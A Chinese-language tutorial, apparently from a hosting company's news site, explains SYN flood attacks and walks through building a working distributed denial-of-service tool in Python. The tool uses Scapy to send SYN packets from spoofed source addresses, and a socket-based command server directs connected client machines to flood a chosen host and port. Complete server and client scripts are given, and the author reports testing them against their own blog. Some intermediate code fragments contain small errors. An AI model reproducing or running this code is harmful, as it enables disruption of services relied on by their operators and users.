溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Python實(shí)現(xiàn)DDos攻擊的示例分析

發(fā)布時間:2021-04-07 12:01:00 來源:億速云 閱讀:775 作者:小新 欄目:開發(fā)技術(shù)

這篇文章主要介紹Python如何實(shí)現(xiàn)DDos攻擊,文中介紹的非常詳細(xì),具有一定的參考價值,感興趣的小伙伴們一定要看完!

SYN 泛洪攻擊

SYN泛洪攻擊是一種比較常用的Dos方式之一。通過發(fā)送大量偽造的 TCP 連接請求,使被攻擊主機(jī)資源耗盡(通常是 CPU 滿負(fù)荷或內(nèi)存不足)的攻擊方式

我們都知道建立 TCP 連接需要三次握手。正常情況下客戶端首先向服務(wù)器端發(fā)送SYN報文,隨后服務(wù)端返回以SYN+ACK報文,最后客戶端向服務(wù)端發(fā)送ACK報文完成三次握手

Python實(shí)現(xiàn)DDos攻擊的示例分析

而SYN泛洪攻擊則是客戶端向服務(wù)器發(fā)送SYN報文之后就不再響應(yīng)服務(wù)器回應(yīng)的報文。由于服務(wù)器在處理 TCP 請求時,會在協(xié)議棧留一塊緩沖區(qū)來存儲握手的過程,當(dāng)然如果超過一定時間內(nèi)沒有接收到客戶端的報文,本次連接在協(xié)議棧中存儲的數(shù)據(jù)將會被丟棄。攻擊者如果利用這段時間發(fā)送大量的連接請求,全部掛起在半連接狀態(tài)。這樣將不斷消耗服務(wù)器資源,直到拒絕服務(wù)

Scapy3k 基本用法

Scapy3k其實(shí)就是Scapy的 Python3 版本,以下簡稱Scapy。Scapy是一個強(qiáng)大的交互式數(shù)據(jù)包處理程序??捎脕戆l(fā)送、嗅探、解析和偽造網(wǎng)絡(luò)數(shù)據(jù)包。在網(wǎng)絡(luò)攻擊和滲透測試重應(yīng)用非常廣泛。Scapy是一個獨(dú)立的程序同時還可以作為 Python 的第三方庫使用

首先安裝Scapy3k,Windows 不方便,下面的操作我都是在 Linux 中進(jìn)行的

sudo pip install scapy

Python實(shí)現(xiàn)DDos攻擊的示例分析

運(yùn)行scapy

sudo scapy

Python實(shí)現(xiàn)DDos攻擊的示例分析

因為Scapy發(fā)送數(shù)據(jù)包需要root權(quán)限,所以這里加上sudo。另外運(yùn)行的時候會出現(xiàn)一些警告信息,因為沒有安裝相應(yīng)的依賴包,不過暫時用不到,所以不用管

接下來我們用Scapy構(gòu)造一個簡單的數(shù)據(jù)包

pkt = IP(dst = "192.168.50.10")

Python實(shí)現(xiàn)DDos攻擊的示例分析

接下來構(gòu)造SYN數(shù)據(jù)包,并發(fā)送出去

pkt = IP(src = "125.4.2.1",dst="192.168.50.10")/TCP(dport=80,flags="S")
send(pkt)

我們構(gòu)造了一個 IP 包和 TCP 包,并將它們組合到一塊,這樣就有了一個完整的 TCP 數(shù)據(jù)包,否則是無法發(fā)送出去的。IP 包中我們指定了源地址src和目的地址dst,其中src是我們偽造的地址,這也是保護(hù)攻擊者的一種方式。flags的值設(shè)定為S,說明我們要發(fā)送的是一個SYN數(shù)據(jù)包。非常簡單的一段指令就夠早了一個偽造了源 IP 地址的SYN數(shù)據(jù)包

Python實(shí)現(xiàn)DDos攻擊的示例分析

代碼實(shí)現(xiàn)

現(xiàn)在我們要用 Python 以第三方庫的形式使用Scapy,使用方法和用交互式 Shell 的方式一樣

前面我們構(gòu)造了SYN數(shù)據(jù)包,現(xiàn)在需要實(shí)現(xiàn)隨機(jī)偽造源 IP 地址、以及不同的源端口向目標(biāo)主機(jī)發(fā)送SYN數(shù)據(jù)包:

import random
from scapy.all import *
def synFlood(tgt,dPort):
 srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
 for sPort in range(1024,65535):
 index = random.randrange(4)
 ipLayer = IP(src=srcList[index], dst=tgt)
 tcpLayer = TCP(sport=sPort, dport = dPort, flags="S")
 packet = ipLayer / tcpLayer 
 send(packet)

DDos 實(shí)現(xiàn)思路

前面我們已經(jīng)實(shí)現(xiàn)了SYN泛洪攻擊,而DDos則是多臺主機(jī)一起發(fā)起攻擊,我們只需要能發(fā)送命令,讓連接到服務(wù)器的客戶端一起向同一目標(biāo)發(fā)起攻擊就可以了

世界最大的黑客組織Anonymous經(jīng)常使用LOIC(low Orbit Ion Cannon,滴軌道離子炮)進(jìn)行大規(guī)模的DDos。LOIC有個HIVEMIND模式,用戶可以通過連接到一臺 IRC 服務(wù)器,當(dāng)有用戶發(fā)送命令,任何以HIVEMIND模式連接到 IRC 服務(wù)器的成員都會立即攻擊該目標(biāo)

這種方式的優(yōu)點(diǎn)事不需要傀儡機(jī),可以有很多 "志同道合" 的人一起幫助你實(shí)現(xiàn)DDos,不過不太適合在傀儡機(jī)中使用。當(dāng)然實(shí)現(xiàn)思路有很多,根據(jù)不同情況的選擇也會不同。而這里我們將采用客戶端、服務(wù)器的方式來實(shí)現(xiàn)DDos,這種方式非常簡單,可擴(kuò)展性也比較強(qiáng)

Python實(shí)現(xiàn)DDos攻擊的示例分析

argparse 模塊

由于 Server 端需要發(fā)送命令去控制 Client 端發(fā)起攻擊,所以這里我們先規(guī)定好命令格式

#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>

-H后面是被攻擊主機(jī)的 IP 地址,-p指定被攻擊的端口號,-c控制攻擊的開始與停止

命令制定好了,接下來看一下如何使用命令解析庫argparse

# Import argparse package
import argparse
# New ArgumentParser object
parser = argparse.ArgumentParser(description="Process some integers.")
# Add parameter
parser.add_argument('-p', dest='port', type = int, help = 'An port number!')
# Parse command line arguments
args = parser.parse_args()
print("Port:",args.port)

上面的代碼中,我們創(chuàng)建了一個ArgumentParser對象,description參數(shù)是對命令行解析的一個描述信息,通常在我們使用-h命令的時候顯示。add_argument添加我們要解析的參數(shù),這里我們只添加了一個-p參數(shù),dest是通過parse_args()函數(shù)返回的對象中的一個屬性名稱。type就是解析參數(shù)的類型。help指定的字符串是為了生成幫助信息。argparse默認(rèn)就支持-h參數(shù),只要我們在添加參數(shù)的時候指定help的值就可以生成幫助信息了

socket 模塊

Python 中的socket提供了訪問 BSDsocket的接口,可以非常方便的實(shí)現(xiàn)網(wǎng)絡(luò)中的信息交換。通常我們使用socket的時候需要指定ip地址、端口號、協(xié)議類型。在進(jìn)行socket編程之前我們先了解一下客戶端(Client)和服務(wù)器(Server)的概念。通俗的講,主動發(fā)起連接請求的稱為客戶端,監(jiān)聽端口響應(yīng)連接的稱為服務(wù)器。下面我寫一個客戶端和服務(wù)器的例子:

客戶端

# Import socket package
import socket

# Create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Establish connection
s.connect(('192.168.0.100', 7786))

上面這個例子我們首先導(dǎo)入 socket 庫,然后創(chuàng)建了一個 socket 對象,socket 對象中的參數(shù)AF_INET表示我們使用的是 IPV4 協(xié)議,SOCK_STREAM則表示我們使用的是基于流的 TCP 協(xié)議。最后我們指定ip地址和端口號建立連接

服務(wù)器

# Import socket package
import socket

cliList = []
# Create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Specify IP & Port
s.bind(('0.0.0.0', 7786))

# Strat monitor
s.listen(10)

while True:
 # Receive a new connection
 sock, addr = s.accept()
 # Add sock to the list
 cliList.append(sock)

服務(wù)器的寫法比客戶端稍微復(fù)雜一些,在創(chuàng)建完 socket 之后,要綁定一個地址和端口,這里的0.0.0.0表示綁定到所有的網(wǎng)絡(luò)地址,端口號只要是沒被占用的就可以。之后開始監(jiān)聽端口,并在參數(shù)中指定最大連接數(shù)為 10。最后循環(huán)等待新的連接,并將已連接的 socket 對象添加到列表中。更多相關(guān)細(xì)節(jié)可以查看 Python 官方文檔

代碼實(shí)現(xiàn)

Server 端

由于 Server 端能等待 Client 主動連接,所以我們在 Server 端發(fā)送命令,控制 Client 端發(fā)起SYN泛洪攻擊

在主函數(shù)中我們創(chuàng)建 socket,綁定所有網(wǎng)絡(luò)地址和58868端口并開始監(jiān)聽,之后我們新開一個線程來等待客戶端的連接,以免阻塞我們輸入命令

def main():
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind(('0.0.0.0', 58868))
 s.listen(1024)
 t = Thread(target=waitConnect,args(s,))
 t.start()

由于我們要給所有客戶端發(fā)送命令,所以我們在新開的線程中將連接進(jìn)來的 socket 添加到一個 list 中,這個稍后介紹,但在主函數(shù)中我們第一次輸入命令之前需要至少有一個客戶端鏈接到服務(wù)器,所以這里我判斷了一下socket的長度

print('Wait at least a client connection!')
while not len(socketList):
 pass
print('It has been a client connection!')

現(xiàn)在循環(huán)等待輸入命令,輸入之后判斷命令是否滿足命令格式的基本要求,如果滿足,就把命令發(fā)送給所有客戶端

while True:
 print("=" * 50)
 print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"')
 
 # Wait for input command
 cmd_str = input('Please input cmd:')
 if len(cmd_str):
 if cmd_str[0] == '#':
  sendCmd(cmd_str)

現(xiàn)在程序的大體框架已經(jīng)有了,接下來編寫主函數(shù)中沒有完成的子功能。首先我們應(yīng)該實(shí)現(xiàn)等待客戶端的函數(shù),方便開啟新的線程

在這個函數(shù)中,我們只需要循環(huán)等待客戶端的連接就可以,新連接的 socket 要判斷一下是否在 socketList 中已經(jīng)存儲過了,如果沒有,就添加到 socketList 中

# wait connection
def waitConnect(s):
 while True:
 sock, addr = s.accept()
 if sock not in socketList:
  socketList.append(socket)

我們再來實(shí)現(xiàn)發(fā)送命令的函數(shù),這個函數(shù)會遍歷 socketList,將每個 socket 都調(diào)用一次 send 將命令發(fā)送出去

# send command
def sendCmd(cmd):
 print("Send command......")
 for sock in socketList:
 sock.send(cmd.encode = ('UTF-8'))

至此我們的Server端就完成了。新建一個文件,將其命名為ddosSrv.py,向其中添加如下代碼

import socket
import argparse
from threading import Thread

socketList = []
# Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'
# Send command
def sendCmd(cmd):
 print("Send command......")
 for sock in socketList:
 sock.send(cmd.encode('UTF-8'))

# Wait connect
def waitConnect(s):
 while True:
 sock, addr = s.accept()
 if sock not in socketList:
  socketList.append(sock)

def main():
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind(('0.0.0.0', 58868))
 s.listen(1024)
 t = Thread(target = waitConnect, args = (s, ))
 t.start()
 
 print('Wait at least a client connection!')
 while not len(socketList):
 pass
 print('It has been a client connection!')
 
 while True:
 print('=' * 50)
 print('The command format:"#-H xxx.xxx.xxx.xxx -p xxx -c <start>"')
 
 # Wait for input command
 cmd_str = input("Please input cmd:")
 if len(cmd_str):
  if cmd_str[0] == '#':
  sendCmd(cmd_str)

if __name__ == '__main__':
 main()

Client 端

我們將在 Client 端實(shí)現(xiàn)對主機(jī)的SYN泛洪攻擊,并在腳本啟動后主動連接 Server 端,等待 Server 端發(fā)送命令

在主函數(shù)中我們先創(chuàng)建ArgumentParser()對象,并將需要解析的命令參數(shù)添加好

def main():
 p = argparse.ArgumentParser()
 p.add_argument('-H', dest = 'host', type = str)
 p.add_argument('-p', dest = 'port', type = int)
 p.add_argument('-c', dest = 'cmd', type = str)

現(xiàn)在可以創(chuàng)建 socket,連接服務(wù)器了。這里為了測試,我們連接到本地的 58868 端口

try:
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(('127.0.0.1', 58868))
 print('To connected server was success!')
 print('=' * 50)
 cmdHandle(s, p)
except:
 print('The network connected failed!')
 print('Please restart the script!')
 sys.exit(0)

我們將接受命令和處理命令定義在一個單獨(dú)的函數(shù)中。這里我們使用一個全局變量,用于判斷是否有進(jìn)程正在發(fā)起SYN泛洪攻擊。之后就開始循環(huán)接收命令了,接收道德數(shù)據(jù)是byte型,我們需要對其進(jìn)行解碼,解碼之后才是字符串。如果接收到的數(shù)據(jù)長度為 0,就跳過后續(xù)的內(nèi)容,重新接收數(shù)據(jù)

# Process command
def cmdHandle(sock, parser):
 global curProcess
 while True:
 # Receive command
 data = sock.recv(1024).decode('UTF-8')
 if len(data) == 0:
  print('The data is empty')
  continue;

如果數(shù)據(jù)長度不為 0,就判斷是否具有命令基本格式的特征#,滿足基本條件就需要用ArgumentParser對象來解析命令

if data[0] == '#':
 try:
 # Parse command
 options = parser.parse_args(data[1:].split())
 m_host = options.host
 m_port = options.port
 m_cmd = options.cmd

命令參數(shù)解析出來后,還需要判斷到底是start命令還是stop命令。如果是start命令,首先要判斷當(dāng)前是否有進(jìn)程在運(yùn)行,如果有進(jìn)程判斷進(jìn)程是否存活。如果當(dāng)前有進(jìn)程正在發(fā)起SYN泛洪攻擊,我們就先結(jié)束這個進(jìn)程,并清空屏幕,然后再啟動一個進(jìn)程,發(fā)起SYN泛洪攻擊

# DDos start command
if m_cmd.lower() == 'start':
 if curProcess != None and curprocess.is_alive():
 # End of process
 curProcess.terminate()
 curProcess = None
 os.system('clear')
 print('The synFlood is start')
 p = Process(target = synFlood, args = (m_host, m_port))
 p.start()
 curProcess = p

如果命令是stop,并且有進(jìn)程存活,就直接結(jié)束這個進(jìn)程,并清空屏幕,否則就什么也不做

# DDos stop command
 elif m_cmd.lower() == 'stop':
 if curProcess.is_alive():
  curProcess.terminate()
  os.system('clear')
except:
 print('Failed to perform the command!')

最后,新建一個文件,命名為ddosCli.py,向其中添加如下代碼

# -*- coding: utf-8 -*-
import sys
import socket
import random
import argparse
from multiprocessing import Process
from scapy.all import *
import os 
isWorking = False 
curProcess = None

# SYN flood attack
def synFlood(tgt,dPort):
 print('='*100)
 print('The syn flood is running!')
 print('='*100)
 srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
 for sPort in range(1024,65535):
 index = random.randrange(4)
 ipLayer = IP(src=srcList[index], dst=tgt)
 tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")
 packet = ipLayer / tcpLayer 
 send(packet)

# Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start>' 
# Process command
def cmdHandle(sock,parser):
 global curProcess
 while True:
 # Receive command
 data = sock.recv(1024).decode('utf-8')
 if len(data) == 0:
  print('The data is empty')
  return
 if data[0] == '#':
  try:
  # Parse command
  options = parser.parse_args(data[1:].split())
  m_host = options.host
  m_port = options.port
  m_cmd = options.cmd
  # DDos start command
  if m_cmd.lower() == 'start':
   if curProcess != None and curProcess.is_alive():
   curProcess.terminate()
   curProcess = None
   os.system('clear')
   print('The synFlood is start')
   p = Process(target=synFlood,args=(m_host,m_port))
   p.start()
   curProcess = p
  # DDos stop command
  elif m_cmd.lower() =='stop':
   if curProcess.is_alive():
   curProcess.terminate()
   os.system('clear')
  except:
  print('Failed to perform the command!')

def main():
 # Add commands that need to be parsed
 p = argparse.ArgumentParser()
 p.add_argument('-H', dest='host', type=str)
 p.add_argument('-p', dest='port', type=int)
 p.add_argument('-c', dest='cmd', type=str)
 print("*" * 40)
 try:
 # Create socket object
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 # Connect to Server
 s.connect(('127.0.0.1',58868))
 print('To connected server was success!')
 print("=" * 40)
 # Process command
 cmdHandle(s,p)
 except:
 print('The network connected failed!')
 print('Please restart the script!')
 sys.exit(0)

if __name__ == '__main__':
 main()

程序測試

首先運(yùn)行Server端腳本:

sudo python3 ddosSrv.py

然后再運(yùn)行Client端腳本,一定要用root權(quán)限運(yùn)行

此時可以看到Client端已經(jīng)提示連接成功了

Python實(shí)現(xiàn)DDos攻擊的示例分析

Server端也提示有一個客戶端連接了

Python實(shí)現(xiàn)DDos攻擊的示例分析

輸入一個命令測試一下,這里我以我自己的博客為目標(biāo)進(jìn)行測試,各位請遵守網(wǎng)絡(luò)安全法

Python實(shí)現(xiàn)DDos攻擊的示例分析

看到Client端已經(jīng)開始發(fā)送數(shù)據(jù)包了,說明已經(jīng)發(fā)起了SYN泛洪攻擊

以上是“Python如何實(shí)現(xiàn)DDos攻擊”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI